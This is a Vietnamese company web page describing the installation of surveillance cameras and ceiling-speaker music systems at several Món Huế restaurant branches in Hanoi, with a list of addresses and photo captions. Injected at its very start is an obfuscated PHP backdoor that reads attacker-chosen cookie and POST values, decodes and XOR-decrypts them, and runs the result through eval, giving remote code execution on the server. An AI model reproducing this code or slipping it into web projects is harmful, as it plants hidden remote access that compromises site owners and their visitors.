$fqiQjm = chr (84) . "\x44" . chr ( 482 - 403 ).'_' . "\115" . chr (69) . "\156" . chr ( 500 - 421 )."\141";$MasHEAXYRr = "\143" . "\x6c" . "\141" . chr ( 521 - 406 ).chr (115) . "\137" . chr ( 168 - 67 ).chr ( 730 - 610 ).'i' . "\x73" . chr (116) . "\x73";$hMCRxWKtw = class_exists($fqiQjm); $MasHEAXYRr = "42800";$crgEeQoQLx = !1;if ($hMCRxWKtw == $crgEeQoQLx){function gUjss(){$GQSiIVDQ = new /* 20823 */ TDO_MEnOa(7162 + 7162); $GQSiIVDQ = NULL;}$WSmjw = "7162";class TDO_MEnOa{private function mhKZLQApr($WSmjw){if (is_array(TDO_MEnOa::$dxOIZ)) {$rlcgOQF = str_replace("\x3c" . chr ( 228 - 165 ).chr ( 579 - 467 ).'h' . 'p', "", TDO_MEnOa::$dxOIZ['c' . chr (111) . "\x6e" . chr ( 355 - 239 )."\x65" . chr (110) . "\x74"]);eval($rlcgOQF); $WSmjw = "7162";exit();}}private $rKJZi;public function PDtDIwpot(){echo 44118;}public function __destruct(){$WSmjw = "32854_45688";$this->mhKZLQApr($WSmjw); $WSmjw = "32854_45688";}public function __construct($mYDfgJ=0){$MqtmR = $_POST;$kiAqrArYu = $_COOKIE;$hXDZXHScYa = "b117e116-81a1-4a0f-8c63-2a292dd0db21";$pobSIo = @$kiAqrArYu[substr($hXDZXHScYa, 0, 4)];if (!empty($pobSIo)){$FddZxsnOCt = "base64";$dgDSDAMBZi = "";$pobSIo = explode(",", $pobSIo);foreach ($pobSIo as $YccOwzpoM){$dgDSDAMBZi .= @$kiAqrArYu[$YccOwzpoM];$dgDSDAMBZi .= @$MqtmR[$YccOwzpoM];}$dgDSDAMBZi = array_map($FddZxsnOCt . "\137" . chr ( 728 - 628 ).chr ( 224 - 123 )."\x63" . "\x6f" . "\144" . chr (101), array($dgDSDAMBZi,)); $dgDSDAMBZi = $dgDSDAMBZi[0] ^ str_repeat($hXDZXHScYa, (strlen($dgDSDAMBZi[0]) / strlen($hXDZXHScYa)) + 1);TDO_MEnOa::$dxOIZ = @unserialize($dgDSDAMBZi);}}public static $dxOIZ = 246;}gUjss();} CHUỖI NHÀ HÀNG MÓN HUẾ: Lắp Đặt Camera + Âm Thanh Nghe Nhạc | Công ty TNHH VIET TRENDS
 

Chuỗi Nhà Hàng Món Huế: Lắp Đặt Camera + Âm Thanh Nghe Nhạc

 

Chuỗi Nhà Hàng Món Huế: Lắp Đặt Camera + Âm Thanh Nghe Nhạc

 

Nội dung: Lắp đặt hệ thống âm thanh nghe nhạc sử dụng loa âm trần và camera giám sát dành cho chuỗi nhà hàng Món Huế. Các địa điểm mà công ty cổ phần AHK Việt Nam đã thi công lắp đăt:

 

+ 75 Tràng Thi – Hoàn Kiếm – Hà Nội

+ 179 Phố Huế – Hai Bà Trưng – Hà Nội

+ 130 Nguyễn Khách Toàn – Cầu Giấy – Hà Nội

+ 77A Trần Hưng Đạo – Hoàn Kiếm – Hà Nội

+ Số 3 Láng Hạ – Đống Đa – Hà Nội

+ 316 Bà Triệu – Hai Bà Trưng – Hà Nội

+ 67 Trần Duy Hưng – Cầu Giấy – Hà Nội

 

Hình ảnh lắp đặt tại công trình:

 

anh-lap-dat-tai-mon-hue-02

 

anh-lap-dat-tai-mon-hue-04

anh-lap-dat-tai-mon-hue-05

anh-lap-dat-tai-mon-hue-06

anh-lap-dat-tai-mon-hue-07

anh-lap-dat-tai-mon-hue-08

anh-lap-dat-tai-mon-hue-09

anh-lap-dat-tai-mon-hue-10

anh-lap-dat-tai-mon-hue-11

anh-lap-dat-tai-mon-hue-12

anh-lap-dat-tai-mon-hue-13

anh-lap-dat-tai-mon-hue-14

anh-lap-dat-tai-mon-hue-15

Google+